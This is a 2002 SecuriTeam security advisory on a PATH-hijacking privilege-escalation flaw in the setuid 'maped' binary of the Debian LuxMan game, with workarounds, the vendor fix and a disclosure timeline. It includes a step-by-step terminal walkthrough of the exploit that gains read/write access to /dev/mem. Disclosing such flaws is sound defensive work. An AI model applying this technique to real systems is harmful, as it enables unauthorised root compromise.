[UNIX] Non-Explicit Path Vulnerability in LuxMan
From: support@securiteam.com Date: 11/06/02
From: support@securiteam.com To: list@securiteam.com Date: 6 Nov 2002 19:43:47 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Non-Explicit Path Vulnerability in LuxMan
------------------------------------------------------------------------
SUMMARY
Frank McIngvale's LuxMan (<http://packages.debian.org/stable/games/luxman.html>)
is a Linux-based game similar to Pac Man. A vulnerability in the product
allows local attackers to gain elevated privileges.
DETAILS
Maped is a setuid binary that belongs to LuxMan. It executes gzip without
using the full path. A local attacker can create an exploit binary named
gzip and have maped execute it by suitably modifying the PATH environment
variable. The following is a sample run and explanation of an exploit that
duplicates /dev/mem to /tmp/mem:
First, the attacker prepends the current working directory to the PATH
environment variable:
farmer@debian30:~$ export | grep PATH
declare -x PATH="/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games"
farmer@debian30:~$ declare -x PATH="./:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games"
farmer@debian30:~$ export | grep PATH
declare -x PATH="./:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games"
Second, the attacker compiles the exploit as a binary named gzip and
creates a fake archive:
farmer@debian30:~$ cc gzip.c -o gzip
farmer@debian30:~$ touch test.gz
Third, the attacker executes the maped binary:
farmer@debian30:~$ `which maped` test.gz
You must be the owner of the current console to use svgalib. Not running
in a graphics capable console, and unable to find one. Using VGA driver.
svgalib 1.4.3
..
At this point, /dev/mem is being duplicated into /tmp/mem. The descriptor
to /dev/mem can be analyzed in a separate terminal:
farmer@debian30:~$ lsof | grep /dev/mem
gzip 5197 farmer 5u CHR 1,1 178294 /dev/mem
farmer@debian30:~$ cd /proc/5197/fd/
farmer@debian30:~$ ls -l
total 0
lrwx------ 1 farmer farmer 64 Oct 10 05:56 0 -> /dev/pts/1
l-wx------ 1 farmer farmer 64 Oct 10 05:56 1 -> pipe:[4991]
lrwx------ 1 farmer farmer 64 Oct 10 05:56 2 -> /dev/pts/1
lrwx------ 1 farmer farmer 64 Oct 10 05:56 3 -> /tmp/mem
lr-x------ 1 farmer farmer 64 Oct 10 05:56 4 -> /dev/zero
lrwx------ 1 farmer farmer 64 Oct 10 05:56 5 -> /dev/mem
It is clear that descriptor 5 is a read/write descriptor to /dev/mem.
Analysis:
Any local user can launch this attack to gain read/write access to
/dev/mem. Such access can lead to local root compromise. Exploitation is
possible by scanning the file for fragments of the master password file
and modifying kernel memory to re-map system calls.
Detection:
LuxMan 0.41, which is packaged and distributed with Debian Linux 3.0r0, is
vulnerable. It is probable that the same LuxMan version is vulnerable on
other platforms as well.
Workaround:
Customers should consider one of the two following options:
Option 1: Remove the LuxMan package by issuing the command "# apt-get
remove luxman".
Option 2: Remove the setuid bit from the maped binary by executing the
command "# chmod -s `which maped`".
Vendor response:
The Debian Project has made available an updated LuxMan package that fixes
this vulnerability. More information is available in DSA-189 at
<http://www.debian.org/security/2002/dsa-189>.
Disclosure timeline:
10/03/2002 Issue disclosed to iDEFENSE
10/31/2002 Maintainer, Janos Lenart (ocsi@debian.org), and
security@debian.org notified
10/31/2002 iDEFENSE clients notified
11/02/2002 Responses received from ocsi@debian.org and Martin Schulze
(joey@infodrom.org)
11/06/2002 Public disclosure
ADDITIONAL INFORMATION
The original advisory can be downloaded from:
<http://www.idefense.com/advisory/11.06.02.txt>
The information has been provided by David Endler of iDEFENSE
(dendler@idefense.com); the vulnerability was found by Texonet.